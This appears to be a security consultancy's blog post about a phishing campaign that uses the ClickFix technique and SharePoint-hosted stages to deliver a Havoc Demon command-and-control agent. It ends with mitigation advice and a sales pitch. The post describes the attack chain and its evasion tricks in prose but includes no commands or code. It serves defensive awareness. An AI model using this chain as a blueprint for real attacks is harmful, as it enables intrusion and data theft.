TechHorizon Consulting

SharePoint Under Siege: The ClickFix Havoc C2 Attack

EJ

Mar 04, 2025By Eli Junco

Cybercriminals are constantly innovating their methods, and the latest phishing campaign is no exception. In this new attack, threat actors are leveraging the ClickFix technique to deliver a modified open-source command-and-control (C2) framework known as Havoc Demon, all while hiding malicious activity within trusted Microsoft SharePoint sites.

The Anatomy of the Attack

The campaign begins with a phishing email containing an HTML attachment named “Documents.html.” When opened, the attachment displays a benign error message designed to trick the user into taking a seemingly harmless action: copying and executing a PowerShell command. This is the ClickFix technique in action—a form of social engineering that exploits user trust and curiosity.

Once the victim copies and pastes the command into their terminal or PowerShell, the next stage of the attack is triggered. The command downloads a remote PowerShell script from an attacker-controlled SharePoint server. Before proceeding further, this script checks to ensure it isn’t running in a sandboxed environment—a common tactic used to thwart automated analysis.

If the environment is deemed safe, the script downloads the Python interpreter (“pythonw.exe”) if it isn’t already present. With Python in hand, the attackers then fetch a Python script from the same SharePoint location. This script serves as a shellcode loader for KaynLdr—a reflective loader written in C and Assembly that launches an embedded Dynamic Link Librariy (DLL). In this instance, that DLL is the Havoc Demon agent, which provides the attackers with robust C2 functionality.

Businessman and Internet Security concept

Hiding in Plain Sight


One of the most alarming aspects of this campaign is its clever use of legitimate services to mask malicious activity. The threat actor hides each malware stage behind a SharePoint site and uses a modified version of Havoc Demon in conjunction with the Microsoft Graph API. This strategy effectively camouflages C2 communications within normal SharePoint functions, making them extremely difficult to detect.

Once operational, the malware creates two victim-specific files in the SharePoint document library: one for transmitting stolen data and one for receiving commands from the C2 server. All communications are encrypted using AES-256 in CTR mode, ensuring that data exfiltrated from the victim remains obfuscated and difficult to trace.

Implications and Industry Observations


This multi-stage attack reflects a disturbing trend among cybercriminals—using open-source frameworks and legitimate services to evade detection. Researchers at Fortinet ForEGuard Labs have highlighted that this campaign is a collaboration between two threat actor groups: TA2726, which acts as the traffic distributor using tools like Keitaro TDS, and TA2727, the actual malware distributor. This collaboration not only increases the campaign’s reach across Windows, macOS, and Android devices but also complicates efforts to track and mitigate the threat.

Experts like Eric Schwake, director of cybersecurity strategy at Salt Security, warn that "the tactic of concealing malware stages within SharePoint sites and using the Microsoft Graph API to mask C2 communications is particularly alarming." Thomas Richards, principal consultant at Black Duck, notes that while open-source frameworks have long been exploited by cybercriminals, using trusted Microsoft services to disguise malicious activity represents a new level of sophistication.

Open Padlock Warning

How to Protect Your Organization


Mitigating the risks posed by such an advanced campaign requires a multi-layered approach:

  • User Training and Awareness:
    • Educate employees on the dangers of phishing and social engineering. Ensure they understand that legitimate updates will never require manual copying and execution of commands.
  • Restrict PowerShell Execution:
    • Enforce policies that restrict the execution of unauthorized PowerShell commands and monitor for unusual command-line activities.
  • Monitor SharePoint Activity:
    • Keep a close eye on SharePoint for any unauthorized file creations or modifications, especially files with victim-specific identifiers.
  • Enhance Threat Detection:
    • Implement advanced threat detection systems capable of identifying anomalous C2 traffic, particularly those masquerading within legitimate Microsoft Graph API communications.
  • Secure API and Network Perimeters:
    • Regularly audit your API security and network configurations to close any loopholes that could be exploited by attackers.

In conclusion, the ClickFix campaign highlights how sophisticated cybercriminals have become in leveraging trusted platforms to mask their malicious activities. By embedding their C2 communications within SharePoint and using social engineering to prompt user actions, these attackers are able to bypass traditional defenses and gain deep access into targeted systems. This multi-stage attack not only underscores the need for vigilance but also demonstrates that even familiar services can be exploited in unexpected ways.

Stay Protected with TechHorizon Consulting


At TechHorizon Consulting, we understand that cybercriminals are constantly refining their tactics to exploit unsuspecting users. We specialize in protecting your network and endpoints by fortifying your defenses, enforcing strict authentication protocols, and proactively monitoring for emerging threats—whether they come through SharePoint, email, or any other vector.

If your organization relies on Microsoft services or is concerned about sophisticated phishing campaigns and C2 operations, now is the time to act. Contact TechHorizon Consulting today to assess your security posture and implement advanced protection strategies that guard against emerging cyber threats.